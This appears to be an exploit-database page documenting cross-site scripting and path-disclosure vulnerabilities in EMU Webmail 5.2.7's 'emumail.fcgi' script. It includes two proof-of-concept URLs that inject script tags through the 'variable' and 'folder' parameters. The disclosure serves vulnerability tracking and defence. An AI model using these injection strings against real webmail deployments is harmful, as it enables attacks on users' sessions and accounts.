[] NeoSense
E X P L O I T S
title author type platform port cve id

Emumail EMU Webmail 5.2.7 - 'emumail.fcgi' Multiple Cross-Site Scripting Vulnerabilities

Author: dr_insane
type: webapps
platform: cgi
port: 
date_added: 2004-03-12 
date_updated: 2013-01-02 
verified: 1 
codes: CVE-2004-2334;OSVDB-4204 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/9861/info

Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script.

EMU Webmail 5.2.7 has been reported to be affected by these issues.

http://www.example.com/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
http://www.example.com/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.